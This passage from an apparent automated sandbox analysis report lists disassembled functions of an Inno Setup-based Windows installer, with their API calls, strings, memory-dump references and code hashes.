                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup$Rm
                                                                                    • API String ID: 1375471231-619888300
                                                                                    • Opcode ID: 184f87e886625dbb871829819008579bdfdecec8b70b72511a305179fb1b08d0
                                                                                    • Instruction ID: adf2f5543b26c1b87df2d6ea404a84bc2f58e6883483325e64833120cf8cc648
                                                                                    • Opcode Fuzzy Hash: 184f87e886625dbb871829819008579bdfdecec8b70b72511a305179fb1b08d0
                                                                                    • Instruction Fuzzy Hash: B0411F34A001099BDB01FBA5D882AEEB7B6EF49304F50557AE401A7792DB74AE058F64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C8044, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 005C8073
                                                                                    • GetFocus.USER32 ref: 005C807B
                                                                                    • RegisterClassW.USER32 ref: 005C809C
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C8134
                                                                                    • SetFocus.USER32(00000000,00000000,005C8156,?,?,00000000,00000001,00000000,?,00624CD7,006D479C,?,00000000,006B7D0C,?,00000001), ref: 005C813B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 495420250-1824977358
                                                                                    • Opcode ID: f91cd026eb05f25d33a6d8af840a27a0896b23e2d12ba556de4d8f1fb83d8f0a
                                                                                    • Instruction ID: 5ab169a57db71ca83144016e7fa3c4a7aa592af68df439750d62b7863cf9535f
                                                                                    • Opcode Fuzzy Hash: f91cd026eb05f25d33a6d8af840a27a0896b23e2d12ba556de4d8f1fb83d8f0a
                                                                                    • Instruction Fuzzy Hash: 7D218070A41600AFD710EBA69C02F6ABBE5FB85B40F15452AF500AB291DB74AC4587D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006C3650, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C3663), ref: 00410BB4
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006C3673
                                                                                    • SetWindowLongW.USER32 ref: 006C368F
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006C36A4
                                                                                      • Part of subcall function 006B80BC: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C36AE,00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006B80C6
                                                                                      • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006C36D4,?,?,000000EC,00000000), ref: 006C370E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup$TYj
                                                                                    • API String ID: 1533765661-222076697
                                                                                    • Opcode ID: 5768e0d582e52e8d6d168eb6fadb8a8827a4ce1f72d3aeffb140806789636c9b
                                                                                    • Instruction ID: e9fc4baf4b40b491f8675e1572dec19425dd6fa1bf8a55e0520f1f642e799667
                                                                                    • Opcode Fuzzy Hash: 5768e0d582e52e8d6d168eb6fadb8a8827a4ce1f72d3aeffb140806789636c9b
                                                                                    • Instruction Fuzzy Hash: D3213E74204600AFC341EB69DC82DA67BFAEB8F7107518565F914877A1CB75A840CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00423A18, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A28
                                                                                    • GetLastError.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A37
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A3F
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A5A
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A68
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    • Opcode ID: a7d48c479effa99c13726cd06c9a81b40db213f168e3472006e923150bc3a552
                                                                                    • Instruction ID: 6af4817109388cbf865bbcb6c057fea4a38b610039f66ef5cc830b203be569cf
                                                                                    • Opcode Fuzzy Hash: a7d48c479effa99c13726cd06c9a81b40db213f168e3472006e923150bc3a552
                                                                                    • Instruction Fuzzy Hash: 0CF0A061340224199D203DBF2889EBF125CC9827EFB54077BF990E22D2DA2E5F87426D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C6570, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C66A6,?,006AD078,00000000,00000000), ref: 005C65AC
                                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C66A6,?,006AD078), ref: 005C661A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID: jn\$jn\
                                                                                    • API String ID: 3660427363-2382671196
                                                                                    • Opcode ID: 3e48dd5595439cec9071c1e48ee77c5669d35979900cfc549d71363e24bad7b2
                                                                                    • Instruction ID: 8bceae826fb58f5cc1abe10999adb5643ee7cb9af79bc91dae7968670a065b85
                                                                                    • Opcode Fuzzy Hash: 3e48dd5595439cec9071c1e48ee77c5669d35979900cfc549d71363e24bad7b2
                                                                                    • Instruction Fuzzy Hash: C0411871900219AFDB20DFD5C981EAEBBB9FB44704F61446EE800FB280D734AF848B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 00409FD0
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 0040A009
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 6b04fe895df515a821d09e547ffe5bfc8ba40b00724ca42204d1de2ed8c9432c
                                                                                    • Instruction ID: 014c5f1a4e041581483faaf8c6c30c3af58183677a5e41c876bcbf2d6f0d04a1
                                                                                    • Opcode Fuzzy Hash: 6b04fe895df515a821d09e547ffe5bfc8ba40b00724ca42204d1de2ed8c9432c
                                                                                    • Instruction Fuzzy Hash: 08316F20A016428AE720EB7A9484B2777E6AB44328F14053FE449E32E3DBBDDC84C75D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 00409FD0
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 0040A009
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: bc5cc9c885041f3e0416e36a86510f2d3f0a1f0eb85ab9a766e2f376309b75d0
                                                                                    • Instruction ID: efb01f5a50f6461e4192e351dbf5a863323bf4e3968e843dfa2323db1f55653e
                                                                                    • Opcode Fuzzy Hash: bc5cc9c885041f3e0416e36a86510f2d3f0a1f0eb85ab9a766e2f376309b75d0
                                                                                    • Instruction Fuzzy Hash: 38316020A057824AE721EB769484B2777E26F14318F14447FE049E62E3DBBDDC84C75E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004785F0, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: e2fbedc3dc89719e5dd2976349d3016b2513452d0a3c721afe5b6b3b40081790
                                                                                    • Instruction ID: 76cbbdd911646a042e8386dfe44f4c7e199d23327d7aedec1f7355223984a46f
                                                                                    • Opcode Fuzzy Hash: e2fbedc3dc89719e5dd2976349d3016b2513452d0a3c721afe5b6b3b40081790
                                                                                    • Instruction Fuzzy Hash: 0C0184716411047BCB50EB98EC85FEA739EE749318F14D21BF508EB392DA79D8418798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060E938, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForInputIdle.USER32 ref: 0060E964
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 0060E986
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 0060E997
                                                                                    • CloseHandle.KERNEL32(00000001,0060E9C4,0060E9BD,?,?,?,00000001,?,?,0060ED66,?,00000000,0060ED7C,?,?,?), ref: 0060E9B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4071923889-0
                                                                                    • Opcode ID: d4595798dbbd3cccb17cd9651617aba3631158074f85f98b5c6695d3779827f6
                                                                                    • Instruction ID: b0ec01102f1d6a048394a8bbdf14247bb0d5afa7f8636e75558ea4907a3e5d2e
                                                                                    • Opcode Fuzzy Hash: d4595798dbbd3cccb17cd9651617aba3631158074f85f98b5c6695d3779827f6
                                                                                    • Instruction Fuzzy Hash: 5B012870A803147EEB24DBA68D06FEBBBADDF45720F510916F604C32C1D5759D40C665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AB4C4, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 2bedbc9781a32906f3d6a9bc52efc672a59cc3eb09c43f68aa12ebb7b9980c23
                                                                                    • Instruction ID: 2fff96d873347bd790470967934f41cc3c5b953411b1929c54c424c1fdffd6dc
                                                                                    • Opcode Fuzzy Hash: 2bedbc9781a32906f3d6a9bc52efc672a59cc3eb09c43f68aa12ebb7b9980c23
                                                                                    • Instruction Fuzzy Hash: B5E02BA27083911882257DAE18855BE598ACFC375DF28193FF094C2143C6088D854626
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060CE90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060CF89,?,006D479C,?,00000003,00000000,00000000,?,006AB2FB,00000000,006AB42A), ref: 0060CED8
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060CF89,?,006D479C,?,00000003,00000000,00000000,?,006AB2FB,00000000,006AB42A), ref: 0060CEE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 1990292899e41e678343515c0d89d56f152e79c03e827f697b231b302f2421b6
                                                                                    • Instruction ID: bd18ce1fa3822070f52fa9210757cddfa10fef4474c97575e6730c1523ad4e06
                                                                                    • Opcode Fuzzy Hash: 1990292899e41e678343515c0d89d56f152e79c03e827f697b231b302f2421b6
                                                                                    • Instruction Fuzzy Hash: EE216575A402099FDB04EBE1C842EEFB7BAEF88304F10457AE501A3781DA749E058AA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060B998, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 0060B9EC
                                                                                    • GetLastError.KERNEL32(00000000,00000000,006D479C,?,?,00624B84,00000000,jKb,?,00000000,00000000,0060BA12,?,?,00000000,00000001), ref: 0060B9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastProcess
